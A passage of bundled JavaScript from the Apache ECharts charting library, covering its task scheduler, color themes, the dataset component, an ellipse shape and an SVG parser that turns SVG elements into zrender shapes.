agentStubMap.set(pipelineId, createTask(\n                {reset: stubReset, onDirty: stubOnDirty}\n            ));\n            // When the result of `getTargetSeries` changed, the overallTask\n            // should be set as dirty and re-performed.\n            overallTask.dirty();\n        }\n        stub.context = {\n            model: seriesModel,\n            overallProgress: overallProgress,\n            modifyOutputEnd: modifyOutputEnd\n        };\n        stub.agent = overallTask;\n        stub.__block = overallProgress;\n\n        pipe(scheduler, seriesModel, stub);\n    }\n\n    // Clear unused stubs.\n    var pipelineMap = scheduler._pipelineMap;\n    agentStubMap.each(function (stub, pipelineId) {\n        if (!pipelineMap.get(pipelineId)) {\n            stub.dispose();\n            // When the result of `getTargetSeries` changed, the overallTask\n            // should be set as dirty and re-performed.\n            overallTask.dirty();\n            agentStubMap.removeKey(pipelineId);\n        }\n    });\n}\n\nfunction overallTaskReset(context) {\n    context.overallReset(\n        context.ecModel, context.api, context.payload\n    );\n}\n\nfunction stubReset(context, upstreamContext) {\n    return context.overallProgress && stubProgress;\n}\n\nfunction stubProgress() {\n    this.agent.dirty();\n    this.getDownstream().dirty();\n}\n\nfunction stubOnDirty() {\n    this.agent && this.agent.dirty();\n}\n\nfunction seriesTaskPlan(context) {\n    return context.plan && context.plan(\n        context.model, context.ecModel, context.api, context.payload\n    );\n}\n\nfunction seriesTaskReset(context) {\n    if (context.useClearVisual) {\n        context.data.clearAllVisual();\n    }\n    var resetDefines = context.resetDefines = normalizeToArray(context.reset(\n        context.model, context.ecModel, context.api, context.payload\n    ));\n    return resetDefines.length > 1\n        ? map(resetDefines, function (v, idx) {\n            return makeSeriesTaskProgress(idx);\n        })\n        : singleSeriesTaskProgress;\n}\n\nvar singleSeriesTaskProgress = makeSeriesTaskProgress(0);\n\nfunction makeSeriesTaskProgress(resetDefineIdx) {\n    return function (params, context) {\n        var data = context.data;\n        var resetDefine = context.resetDefines[resetDefineIdx];\n\n        if (resetDefine && resetDefine.dataEach) {\n            for (var i = params.start; i < params.end; i++) {\n                resetDefine.dataEach(data, i);\n            }\n        }\n        else if (resetDefine && resetDefine.progress) {\n            resetDefine.progress(params, data);\n        }\n    };\n}\n\nfunction seriesTaskCount(context) {\n    return context.data.count();\n}\n\nfunction pipe(scheduler, seriesModel, task) {\n    var pipelineId = seriesModel.uid;\n    var pipeline = scheduler._pipelineMap.get(pipelineId);\n    !pipeline.head && (pipeline.head = task);\n    pipeline.tail && pipeline.tail.pipe(task);\n    pipeline.tail = task;\n    task.__idxInPipeline = pipeline.count++;\n    task.__pipeline = pipeline;\n}\n\nScheduler.wrapStageHandler = function (stageHandler, visualType) {\n    if (isFunction$1(stageHandler)) {\n        stageHandler = {\n            overallReset: stageHandler,\n            seriesType: detectSeriseType(stageHandler)\n        };\n    }\n\n    stageHandler.uid = getUID('stageHandler');\n    visualType && (stageHandler.visualType = visualType);\n\n    return stageHandler;\n};\n\n\n\n/**\n * Only some legacy stage handlers (usually in echarts extensions) are pure function.\n * To ensure that they can work normally, they should work in block mode, that is,\n * they should not be started util the previous tasks finished. So they cause the\n * progressive rendering disabled. We try to detect the series type, to narrow down\n * the block range to only the series type they concern, but not all series.\n */\nfunction detectSeriseType(legacyFunc) {\n    seriesType = null;\n    try {\n        // Assume there is no async when calling `eachSeriesByType`.\n        legacyFunc(ecModelMock, apiMock);\n    }\n    catch (e) {\n    }\n    return seriesType;\n}\n\nvar ecModelMock = {};\nvar apiMock = {};\nvar seriesType;\n\nmockMethods(ecModelMock, GlobalModel);\nmockMethods(apiMock, ExtensionAPI);\necModelMock.eachSeriesByType = ecModelMock.eachRawSeriesByType = function (type) {\n    seriesType = type;\n};\necModelMock.eachComponent = function (cond) {\n    if (cond.mainType === 'series' && cond.subType) {\n        seriesType = cond.subType;\n    }\n};\n\nfunction mockMethods(target, Clz) {\n    /* eslint-disable */\n    for (var name in Clz.prototype) {\n        // Do not use hasOwnProperty\n        target[name] = noop;\n    }\n    /* eslint-enable */\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar colorAll = [\n    '#37A2DA', '#32C5E9', '#67E0E3', '#9FE6B8', '#FFDB5C', '#ff9f7f',\n    '#fb7293', '#E062AE', '#E690D1', '#e7bcf3', '#9d96f5', '#8378EA', '#96BFFF'\n];\n\nvar lightTheme = {\n\n    color: colorAll,\n\n    colorLayer: [\n        ['#37A2DA', '#ffd85c', '#fd7b5f'],\n        ['#37A2DA', '#67E0E3', '#FFDB5C', '#ff9f7f', '#E062AE', '#9d96f5'],\n        ['#37A2DA', '#32C5E9', '#9FE6B8', '#FFDB5C', '#ff9f7f', '#fb7293', '#e7bcf3', '#8378EA', '#96BFFF'],\n        colorAll\n    ]\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar contrastColor = '#eee';\nvar axisCommon = function () {\n    return {\n        axisLine: {\n            lineStyle: {\n                color: contrastColor\n            }\n        },\n        axisTick: {\n            lineStyle: {\n                color: contrastColor\n            }\n        },\n        axisLabel: {\n            textStyle: {\n                color: contrastColor\n            }\n        },\n        splitLine: {\n            lineStyle: {\n                type: 'dashed',\n                color: '#aaa'\n            }\n        },\n        splitArea: {\n            areaStyle: {\n                color: contrastColor\n            }\n        }\n    };\n};\n\nvar colorPalette = [\n    '#dd6b66', '#759aa0', '#e69d87', '#8dc1a9', '#ea7e53',\n    '#eedd78', '#73a373', '#73b9bc', '#7289ab', '#91ca8c', '#f49f42'\n];\nvar theme = {\n    color: colorPalette,\n    backgroundColor: '#333',\n    tooltip: {\n        axisPointer: {\n            lineStyle: {\n                color: contrastColor\n            },\n            crossStyle: {\n                color: contrastColor\n            },\n            label: {\n                color: '#000'\n            }\n        }\n    },\n    legend: {\n        textStyle: {\n            color: contrastColor\n        }\n    },\n    textStyle: {\n        color: contrastColor\n    },\n    title: {\n        textStyle: {\n            color: contrastColor\n        }\n    },\n    toolbox: {\n        iconStyle: {\n            normal: {\n                borderColor: contrastColor\n            }\n        }\n    },\n    dataZoom: {\n        textStyle: {\n            color: contrastColor\n        }\n    },\n    visualMap: {\n        textStyle: {\n            color: contrastColor\n        }\n    },\n    timeline: {\n        lineStyle: {\n            color: contrastColor\n        },\n        itemStyle: {\n            normal: {\n                color: colorPalette[1]\n            }\n        },\n        label: {\n            normal: {\n                textStyle: {\n                    color: contrastColor\n                }\n            }\n        },\n        controlStyle: {\n            normal: {\n                color: contrastColor,\n                borderColor: contrastColor\n            }\n        }\n    },\n    timeAxis: axisCommon(),\n    logAxis: axisCommon(),\n    valueAxis: axisCommon(),\n    categoryAxis: axisCommon(),\n\n    line: {\n        symbol: 'circle'\n    },\n    graph: {\n        color: colorPalette\n    },\n    gauge: {\n        title: {\n            textStyle: {\n                color: contrastColor\n            }\n        }\n    },\n    candlestick: {\n        itemStyle: {\n            normal: {\n                color: '#FD1050',\n                color0: '#0CF49B',\n                borderColor: '#FD1050',\n                borderColor0: '#0CF49B'\n            }\n        }\n    }\n};\ntheme.categoryAxis.splitLine.show = false;\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * This module is imported by echarts directly.\n *\n * Notice:\n * Always keep this file exists for backward compatibility.\n * Because before 4.1.0, dataset is an optional component,\n * some users may import this module manually.\n */\n\nComponentModel.extend({\n\n    type: 'dataset',\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n\n        // 'row', 'column'\n        seriesLayoutBy: SERIES_LAYOUT_BY_COLUMN,\n\n        // null/'auto': auto detect header, see \"module:echarts/data/helper/sourceHelper\"\n        sourceHeader: null,\n\n        dimensions: null,\n\n        source: null\n    },\n\n    optionUpdated: function () {\n        detectSourceFormat(this);\n    }\n\n});\n\nComponent$1.extend({\n\n    type: 'dataset'\n\n});\n\n/**\n * 椭圆形状\n * @module zrender/graphic/shape/Ellipse\n */\n\nvar Ellipse = Path.extend({\n\n    type: 'ellipse',\n\n    shape: {\n        cx: 0, cy: 0,\n        rx: 0, ry: 0\n    },\n\n    buildPath: function (ctx, shape) {\n        var k = 0.5522848;\n        var x = shape.cx;\n        var y = shape.cy;\n        var a = shape.rx;\n        var b = shape.ry;\n        var ox = a * k; // 水平控制点偏移量\n        var oy = b * k; // 垂直控制点偏移量\n        // 从椭圆的左端点开始顺时针绘制四条三次贝塞尔曲线\n        ctx.moveTo(x - a, y);\n        ctx.bezierCurveTo(x - a, y - oy, x - ox, y - b, x, y - b);\n        ctx.bezierCurveTo(x + ox, y - b, x + a, y - oy, x + a, y);\n        ctx.bezierCurveTo(x + a, y + oy, x + ox, y + b, x, y + b);\n        ctx.bezierCurveTo(x - ox, y + b, x - a, y + oy, x - a, y);\n        ctx.closePath();\n    }\n});\n\n// import RadialGradient from '../graphic/RadialGradient';\n// import Pattern from '../graphic/Pattern';\n// import * as vector from '../core/vector';\n// Most of the values can be separated by comma and/or white space.\nvar DILIMITER_REG = /[\\s,]+/;\n\n/**\n * For big svg string, this method might be time consuming.\n *\n * @param {string} svg xml string\n * @return {Object} xml root.\n */\nfunction parseXML(svg) {\n    if (isString(svg)) {\n        var parser = new DOMParser();\n        svg = parser.parseFromString(svg, 'text/xml');\n    }\n\n    // Document node. If using $.get, doc node may be input.\n    if (svg.nodeType === 9) {\n        svg = svg.firstChild;\n    }\n    // nodeName of <!DOCTYPE svg> is also 'svg'.\n    while (svg.nodeName.toLowerCase() !== 'svg' || svg.nodeType !== 1) {\n        svg = svg.nextSibling;\n    }\n\n    return svg;\n}\n\nfunction SVGParser() {\n    this._defs = {};\n    this._root = null;\n\n    this._isDefine = false;\n    this._isText = false;\n}\n\nSVGParser.prototype.parse = function (xml, opt) {\n    opt = opt || {};\n\n    var svg = parseXML(xml);\n\n    if (!svg) {\n        throw new Error('Illegal svg');\n    }\n\n    var root = new Group();\n    this._root = root;\n    // parse view port\n    var viewBox = svg.getAttribute('viewBox') || '';\n\n    // If width/height not specified, means \"100%\" of `opt.width/height`.\n    // TODO: Other percent value not supported yet.\n    var width = parseFloat(svg.getAttribute('width') || opt.width);\n    var height = parseFloat(svg.getAttribute('height') || opt.height);\n    // If width/height not specified, set as null for output.\n    isNaN(width) && (width = null);\n    isNaN(height) && (height = null);\n\n    // Apply inline style on svg element.\n    parseAttributes(svg, root, null, true);\n\n    var child = svg.firstChild;\n    while (child) {\n        this._parseNode(child, root);\n        child = child.nextSibling;\n    }\n\n    var viewBoxRect;\n    var viewBoxTransform;\n\n    if (viewBox) {\n        var viewBoxArr = trim(viewBox).split(DILIMITER_REG);\n        // Some invalid case like viewBox: 'none'.\n        if (viewBoxArr.length >= 4) {\n            viewBoxRect = {\n                x: parseFloat(viewBoxArr[0] || 0),\n                y: parseFloat(viewBoxArr[1] || 0),\n                width: parseFloat(viewBoxArr[2]),\n                height: parseFloat(viewBoxArr[3])\n            };\n        }\n    }\n\n    if (viewBoxRect && width != null && height != null) {\n        viewBoxTransform = makeViewBoxTransform(viewBoxRect, width, height);\n\n        if (!opt.ignoreViewBox) {\n            // If set transform on the output group, it probably bring trouble when\n            // some users only intend to show the clipped content inside the viewBox,\n            // but not intend to transform the output group. So we keep the output\n            // group no transform. If the user intend to use the viewBox as a\n            // camera, just set `opt.ignoreViewBox` as `true` and set transfrom\n            // manually according to the viewBox info in the output of this method.\n            var elRoot = root;\n            root = new Group();\n            root.add(elRoot);\n            elRoot.scale = viewBoxTransform.scale.slice();\n            elRoot.position = viewBoxTransform.position.slice();\n        }\n    }\n\n    // Some shapes might be overflow the viewport, which should be\n    // clipped despite whether the viewBox is used, as the SVG does.\n    if (!opt.ignoreRootClip && width != null && height != null) {\n        root.setClipPath(new Rect({\n            shape: {x: 0, y: 0, width: width, height: height}\n        }));\n    }\n\n    // Set width/height on group just for output the viewport size.\n    return {\n        root: root,\n        width: width,\n        height: height,\n        viewBoxRect: viewBoxRect,\n        viewBoxTransform: viewBoxTransform\n    };\n};\n\nSVGParser.prototype._parseNode = function (xmlNode, parentGroup) {\n\n    var nodeName = xmlNode.nodeName.toLowerCase();\n\n    // TODO\n    // support <style>...</style> in svg, where nodeName is 'style',\n    // CSS classes is defined globally wherever the style tags are declared.\n\n    if (nodeName === 'defs') {\n        // define flag\n        this._isDefine = true;\n    }\n    else if (nodeName === 'text') {\n        this._isText = true;\n    }\n\n    var el;\n    if (this._isDefine) {\n        var parser = defineParsers[nodeName];\n        if (parser) {\n            var def = parser.call(this, xmlNode);\n            var id = xmlNode.getAttribute('id');\n            if (id) {\n                this._defs[id] = def;\n            }\n        }\n    }\n    else {\n        var parser = nodeParsers[nodeName];\n        if (parser) {\n            el = parser.call(this, xmlNode, parentGroup);\n            parentGroup.add(el);\n        }\n    }\n\n    var child = xmlNode.firstChild;\n    while (child) {\n        if (child.nodeType === 1) {\n            this._parseNode(child, el);\n        }\n        // Is text\n        if (child.nodeType === 3 && this._isText) {\n            this._parseText(child, el);\n        }\n        child = child.nextSibling;\n    }\n\n    // Quit define\n    if (nodeName === 'defs') {\n        this._isDefine = false;\n    }\n    else if (nodeName === 'text') {\n        this._isText = false;\n    }\n};\n\nSVGParser.prototype._parseText = function (xmlNode, parentGroup) {\n    if (xmlNode.nodeType === 1) {\n        var dx = xmlNode.getAttribute('dx') || 0;\n        var dy = xmlNode.getAttribute('dy') || 0;\n        this._textX += parseFloat(dx);\n        this._textY += parseFloat(dy);\n    }\n\n    var text = new Text({\n        style: {\n            text: xmlNode.textContent,\n            transformText: true\n        },\n        position: [this._textX || 0, this._textY || 0]\n    });\n\n    inheritStyle(parentGroup, text);\n    parseAttributes(xmlNode, text, this._defs);\n\n    var fontSize = text.style.fontSize;\n    if (fontSize && fontSize < 9) {\n        // PENDING\n        text.style.fontSize = 9;\n        text.scale = text.scale || [1, 1];\n        text.scale[0] *= fontSize / 9;\n        text.scale[1] *= fontSize / 9;\n    }\n\n    var rect = text.getBoundingRect();\n    this._textX += rect.width;\n\n    parentGroup.add(text);\n\n    return text;\n};\n\nvar nodeParsers = {\n    'g': function (xmlNode, parentGroup) {\n        var g = new Group();\n        inheritStyle(parentGroup, g);\n        parseAttributes(xmlNode, g, this._defs);\n\n        return g;\n    },\n    'rect': function (xmlNode, parentGroup) {\n        var rect = new Rect();\n        inheritStyle(parentGroup, rect);\n        parseAttributes(xmlNode, rect, this._defs);\n\n        rect.setShape({\n            x: parseFloat(xmlNode.getAttribute('x') || 0),\n            y: parseFloat(xmlNode.getAttribute('y') || 0),\n            width: parseFloat(xmlNode.getAttribute('width') || 0),\n            height: parseFloat(xmlNode.getAttribute('height') || 0)\n        });\n\n        // console.log(xmlNode.getAttribute('transform'));\n        // console.log(rect.transform);\n\n        return rect;\n    },\n    'circle': function (xmlNode, parentGroup) {\n        var circle = new Circle();\n        inheritStyle(parentGroup, circle);\n        parseAttributes(xmlNode, circle, this._defs);\n\n        circle.setShape({\n            cx: parseFloat(xmlNode.getAttribute('cx') || 0),\n            cy: parseFloat(xmlNode.getAttribute('cy') || 0),\n            r: parseFloat(xmlNode.getAttribute('r') || 0)\n        });\n\n        return circle;\n    },\n    'line': function (xmlNode, parentGroup) {\n        var line = new Line();\n        inheritStyle(parentGroup, line);\n        parseAttributes(xmlNode, line, this._defs);\n\n        line.setShape({\n            x1: parseFloat(xmlNode.getAttribute('x1') || 0),\n            y1: parseFloat(xmlNode.getAttribute('y1') || 0),\n            x2: parseFloat(xmlNode.getAttribute('x2') || 0),\n            y2: parseFloat(xmlNode.getAttribute('y2') || 0)\n        });\n\n        return line;\n    },\n    'ellipse': function (xmlNode, parentGroup) {\n        var ellipse = new Ellipse();\n        inheritStyle(parentGroup, ellipse);\n        parseAttributes(xmlNode, ellipse, this._defs);\n\n        ellipse.setShape({\n            cx: parseFloat(xmlNode.getAttribute('cx') || 0),\n            cy: parseFloat(xmlNode.getAttribute('cy') || 0),\n            rx: parseFloat(xmlNode.getAttribute('rx') || 0),\n            ry: parseFloat(xmlNode.getAttribute('ry') || 0)\n        });\n        return ellipse;\n    },\n    'polygon': function (xmlNode, parentGroup) {\n        var points = xmlNode.getAttribute('points');\n        if (points) {\n            points = parsePoints(points);\n        }\n        var polygon = new Polygon({\n            shape: {\n                points: points || []\n            }\n        });\n\n        inheritStyle(parentGroup, polygon);\n        parseAttributes(xmlNode, polygon, this._defs);\n\n        return polygon;\n    },\n    'polyline': function (xmlNode, parentGroup) {\n        var path = new Path();\n        inheritStyle(parentGroup, path);\n        parseAttributes(xmlNode, path, this._defs);\n\n        var points = xmlNode.getAttribute('points');\n        if (points) {\n            points = parsePoints(points);\n        }\n        var polyline = new Polyline({\n            shape: {\n                points: points || []\n            }\n        });\n\n        return polyline;\n    },\n    'image': function (xmlNode, parentGroup) {\n        var img = new ZImage();\n        inheritStyle(parentGroup, img);\n        parseAttributes(xmlNode, img, this._defs);\n\n        img.setStyle({\n            image: xmlNode.getAttribute('xlink:href'),\n            x: xmlNode.getAttribute('x'),\n            y: xmlNode.getAttribute('y'),\n            width: xmlNode.getAttribute('width'),\n            height: xmlNode.getAttribute('height')\n        });\n\n        return img;\n    },\n    'text': function (xmlNode, parentGroup) {\n        var x = xmlNode.getAttribute('x') || 0;\n        var y = xmlNode.getAttribute('y') || 0;\n        var dx = xmlNode.getAttribute('dx') || 0;\n        var dy = xmlNode.getAttribute('dy') || 0;\n\n        this._textX = parseFloat(x) + parseFloat(dx);\n        this._textY = parseFloat(y) + parseFloat(dy);\n\n        var g = new Group();\n        inheritStyle(parentGroup, g);\n        parseAttributes(xmlNode, g, this._defs);\n\n        return g;\n    },\n    'tspan': function (xmlNode, parentGroup) {\n        var x = xmlNode.getAttribute('x');\n        var y = xmlNode.getAttribute('y');\n        if (x != null) {\n            // new offset x\n            this._textX = parseFloat(x);\n        }\n        if (y != null) {\n            // new offset y\n            this._textY = parseFloat(y);\n        }\n        var dx = xmlNode.getAttribute('dx') || 0;\n        var dy = xmlNode.getAttribute('dy') || 0;\n\n        var g = new Group();\n\n        inheritStyle(parentGroup, g);\n        parseAttributes(xmlNode, g, this._defs);\n\n\n        this._textX += dx;\n        this._textY += dy;\n\n        return g;\n    },\n    'path': function (xmlNode, parentGroup) {\n        // TODO svg fill rule\n        // https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/fill-rule\n        // path.style.globalCompositeOperation = 'xor';\n        var d = xmlNode.getAttribute('d') || '';\n\n        // Performance sensitive.\n\n        var path = createFromString(d);\n\n        inheritStyle(parentGroup, path);\n        parseAttributes(xmlNode, path, this._defs);\n\n        return path;\n    }\n};\n\nvar defineParsers = {\n\n    'lineargradient': function (xmlNode) {\n        var x1 = parseInt(xmlNode.getAttribute('x1') || 0, 10);\n        var y1 = parseInt(xmlNode.getAttribute('y1') || 0, 10);\n        var x2 = parseInt(xmlNode.getAttribute('x2') || 10, 10);\n        var y2 = parseInt(xmlNode.getAttribute('y2') || 0, 10);\n\n        var gradient = new LinearGradient(x1, y1, x2, y2);\n\n        _parseGradientColorStops(xmlNode, gradient);\n\n        return gradient;\n    },\n\n    'radialgradient': function (xmlNode) {\n\n    }\n};\n\nfunction _parseGradientColorStops(xmlNode, gradient) {\n\n    var stop = xmlNode.firstChild;\n\n    while (stop) {\n        if (stop.nodeType === 1) {\n            var offset = stop.getAttribute('offset');\n            if (offset.indexOf('%') > 0) {  // percentage\n                offset = parseInt(offset, 10) / 100;\n            }\n            else if (offset) {    // number from 0 to 1\n                offset = parseFloat(offset);\n            }\n            else {\n                offset = 0;\n            }\n\n            var stopColor = stop.getAttribute('stop-color') || '#000000';\n\n            gradient.addColorStop(offset, stopColor);\n        }\n        stop = stop.nextSibling;\n    }\n}\n\nfunction inheritStyle(parent, child) {\n    if (parent && parent.__inheritedStyle) {\n        if (!child.__inheritedStyle) {\n            child.__inheritedStyle = {};\n        }\n        defaults(child.__inheritedStyle, parent.__inheritedStyle);\n    }\n}\n\nfunction parsePoints(pointsString) {\n    var list = trim(pointsString).split(DILIMITER_REG);\n    var points = [];\n\n    for (var i = 0; i < list.length; i += 2) {\n        var x = parseFloat(list[i]);\n        var y = parseFloat(list[i + 1]);\n        points.push([x, y]);\n    }\n    return points;\n}\n\nvar attributesMap = {\n    'fill': 'fill',\n    'stroke': 'stroke',\n    'stroke-width': 'lineWidth',\n    'opacity': 'opacity',\n    'fill-opacity': 'fillOpacity',\n    'stroke-opacity': 'strokeOpacity',\n    'stroke-dasharray': 'lineDash',\n    'stroke-dashoffset': 'lineDashOffset',\n    'stroke-linecap': 'lineCap',\n    'stroke-linejoin': 'lineJoin',\n    'stroke-miterlimit': 'miterLimit',\n    'font-family': 'fontFamily',\n    'font-size': 'fontSize',\n    'font-style': 'fontStyle',\n    'font-weight': 'fontWeight',\n\n    'text-align': 'textAlign',\n    'alignment-baseline': 'textBaseline'\n};\n\nfunction parseAttributes(xmlNode, el, defs, onlyInlineStyle) {\n    var zrStyle = el.__inheritedStyle || {};\n    var isTextEl = el.type === 'text';\n\n    // TODO Shadow\n    if (xmlNode.nodeType === 1) {\n        parseTransformAttribute(xmlNode, el);\n\n        extend(zrStyle, parseStyleAttribute(xmlNode));\n\n        if (!onlyInlineStyle) {\n            for (var svgAttrName in attributesMap) {\n                if (attributesMap.hasOwnProperty(svgAttrName)) {\n                    var attrValue = xmlNode.getAttribute(svgAttrName);\n                    if (attrValue != null) {\n                        zrStyle[attributesMap[svgAttrName]] = attrValue;\n                    }\n                }\n            }\n        }\n    }\n\n    var elFillProp = isTextEl ? 'textFill' : 'fill';\n    var elStrokeProp = isTextEl ? 'textStroke' : 'stroke';\n\n    el.style = el.style || new Style();\n    var elStyle = el.style;\n\n    zrStyle.fill != null && elStyle.set(elFillProp, getPaint(zrStyle.fill, defs));\n    zrStyle.stroke != null && elStyle.set(elStrokeProp, getPaint(zrStyle.stroke, defs));\n\n    each$1([\n        'lineWidth', 'opacity', 'fillOpacity', 'strokeOpacity', 'miterLimit', 'fontSize'\n    ], function (propName) {\n        var elPropName = (propName === 'lineWidth' && isTextEl) ? 'textStrokeWidth' : propName;\n        zrStyle[propName] != null && elStyle.set(elPropName, parseFloat(zrStyle[propName]));\n    });\n\n    if (!zrStyle.textBaseline || zrStyle.textBaseline === 'auto') {\n        zrStyle.textBaseline = 'alphabetic';\n    }\n    if (zrStyle.textBaseline === 'alphabetic') {\n        zrStyle.textBaseline = 'bottom';\n    }\n    if (zrStyle.textAlign === 'start') {\n        zrStyle.textAlign = 'left';\n    }\n    if (zrStyle.textAlign === 'end') {\n        zrStyle.textAlign = 'right';\n    }\n\n    each$1(['lineDashOffset', 'lineCap', 'lineJoin',\n        'fontWeight', 'fontFamily', 'fontStyle', 'textAlign', 'textBaseline'\n    ], function (propName) {\n        zrStyle[propName] != null && elStyle.set(propName, zrStyle[propName]);\n    });\n\n    if (zrStyle.lineDash) {\n        el.style.lineDash = trim(zrStyle.lineDash).split(DILIMITER_REG);\n    }\n\n    if (elStyle[elStrokeProp] && elStyle[elStrokeProp] !== 'none') {\n        // enable stroke\n        el[elStrokeProp] = true;\n    }\n\n    el.__inheritedStyle = zrStyle;\n}\n\n\nvar urlRegex = /url\\(\\s*#(.*?)\\)/;\nfunction getPaint(str, defs) {\n    // if (str === 'none') {\n    //     return;\n    // }\n    var urlMatch = defs && str && str.match(urlRegex);\n    if (urlMatch) {\n        var url = trim(urlMatch[1]);\n        var def = defs[url];\n        return def;\n    }\n    return str;\n}\n\nvar transformRegex = /(translate|scale|rotate|skewX|skewY|matrix)\\(([\\-\\s0-9\\.e,]*)\\)/g;\n\nfunction parseTransformAttribute(xmlNode, node) {\n    var transform = xmlNode.getAttribute('transform');\n    if (transform) {\n        transform = transform.replace(/,/g, ' ');\n        var m = null;\n        var transformOps = [];\n        transform.replace(transformRegex, function (str, type, value) {\n            transformOps.push(type, value);\n        });\n        for (var i = transformOps.length - 1; i > 0; i -= 2) {\n            var value = transformOps[i];\n            var type = transformOps[i - 1];\n            m = m || create$1();\n            switch (type) {\n                case 'translate':\n                    value = trim(value).split(DILIMITER_REG);\n                    translate(m, m, [parseFloat(value[0]), parseFloat(value[1] || 0)]);\n                    break;\n                case 'scale':\n                    value = trim(value).split(DILIMITER_REG);\n                    scale$1(m, m, [parseFloat(value[0]), parseFloat(value[1] || value[0])]);\n                    break;\n                case 'rotate':\n                    value = trim(value).split(DILIMITER_REG);\n                    rotate(m, m, parseFloat(value[0]));\n                    break;\n                case 'skew':\n                    value = trim(value).split(DILIMITER_REG);\n                    console.warn('Skew transform is not supported yet');\n                    break;\n                case 'matrix':\n                    var value = trim(value).split(DILIMITER_REG);\n                    m[0] = parseFloat(value[0]);\n                    m[1] = parseFloat(value[1]);\n                    m[2] = parseFloat(value[2]);\n                    m[3] = parseFloat(value[3]);\n                    m[4] = parseFloat(value[4]);\n                    m[5] = parseFloat(value[5]);\n                    break;\n            }\n        }\n        node.setLocalTransform(m);\n    }\n}\n\n// Value may contain space.\nvar styleRegex = /([^\\s:;]+)\\s*:\\s*([^:;]+)/g;\nfunction parseStyleAttribute(xmlNode) {\n    var style = xmlNode.getAttribute('style');\n    var result = {};\n\n    if (!style) {\n        return result;\n    }\n\n    var styleList = {};\n    styleRegex.lastIndex = 0;\n    var styleRegResult;\n    while ((styleRegResult = styleRegex.exec(style)) != null) {\n        styleList[styleRegResult[1]] = styleRegResult[2];\n    }\n\n    for (var svgAttrName in attributesMap) {\n        if (attributesMap.hasOwnProperty(svgAttrName) && styleList[svgAttrName] != null) {\n            result[attributesMap[svgAttrName]] = styleList[svgAttrName];\n        }\n    }\n\n    return result;\n}\n\n/**\n * @param {Array.<number>} viewBoxRect\n * @param {number} width\n * @param {number} height\n * @return {Object} {scale, position}\n */\nfunction makeViewBoxTransform(viewBoxRect, width, height) {\n    var scaleX = width / viewBoxRect.width;\n    var scaleY = height / viewBoxRect.height;\n    var scale = Math.min(scaleX, scaleY);\n    // preserveAspectRatio 'xMidYMid'\n    var viewBoxScale = [scale, scale];\n    var viewBoxPosition = [\n        -(viewBoxRect.x + viewBoxRect.width / 2) * scale + width / 2,\n        -(viewBoxRect.y + viewBoxRect.height / 2) * scale + height / 2\n    ];\n\n    return {\n        scale: viewBoxScale,\n        position: viewBoxPosition\n    };\n}\n\n/**\n * @param {string|XMLElement} xml\n * @param {Object} [opt]\n * @param {number} [opt.width] Default width if svg width not specified or is a percent value.\n * @param {number} [opt.height] Default height if svg height not specified or is a percent value.\n * @param {boolean} [opt.ignoreViewBox]\n * @param {boolean} [opt.ignoreRootClip]\n * @return {Object} result:\n * {\n *     root: Group, The root of the the result tree of zrender shapes,\n *     width: number, the viewport width of the SVG,\n *     height: number, the viewport height of the SVG,\n *     viewBoxRect: {x, y, width, height}, the declared viewBox rect of the SVG, if exists,\n *     viewBoxTransform: the {scale, position} calculated by viewBox and viewport, is exists.\n * }\n */\nfunction parseSVG(xml, opt) {\n    var parser = new SVGParser();\n    return parser.parse(xml, opt);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar storage = createHashMap();\n\n// For minimize the code size of common echarts package,\n// do not put too much logic in this module.\n\nvar mapDataStorage = {\n\n    // The format of record: see `echarts.registerMap`.\n    // Compatible with previous `echarts.registerMap`.\n    registerMap: function (mapName, rawGeoJson, rawSpecialAreas) {\n\n        var records;\n\n        if (isArray(rawGeoJson)) {\n            records = rawGeoJson;\n        }\n        else if (rawGeoJson.svg) {\n            records = [{\n                type: 'svg',\n                source: rawGeoJson.svg,\n                specialAreas: rawGeoJson.specialAreas\n            }];\n        }\n        else {\n            // Backward compatibility.\n            if (rawGeoJson.geoJson && !rawGeoJson.features) {\n                rawSpecialAreas = rawGeoJson.specialAreas;\n                rawGeoJson = 